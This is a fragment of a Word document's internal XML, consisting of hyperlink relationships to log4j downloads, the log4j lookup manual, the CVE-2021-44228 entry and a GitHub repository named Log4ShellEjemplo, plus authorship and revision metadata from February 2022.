    <w:rsid w:val="009903B2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6C604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36B48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59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598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36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logging/log4j/2.14.1/apache-log4j-2.14.1-bin.zip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github.com/jbautistamartin/Log4ShellEjemplo" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://logging.apache.org/log4j/2.x/manual/lookup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nvd.nist.gov/vuln/detail/CVE-2021-44228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rchive.apache.org/dist/logging/log4j/2.17.1/apache-log4j-2.17.1-bin.zi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F584B5-0CDF-4D6F-9102-216D65173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2202</Words>
  <Characters>12115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Capicua</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>14289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Luis Bautista Martín</cp:lastModifiedBy>
  <cp:revision>37</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-02-05T20:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-06T04:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>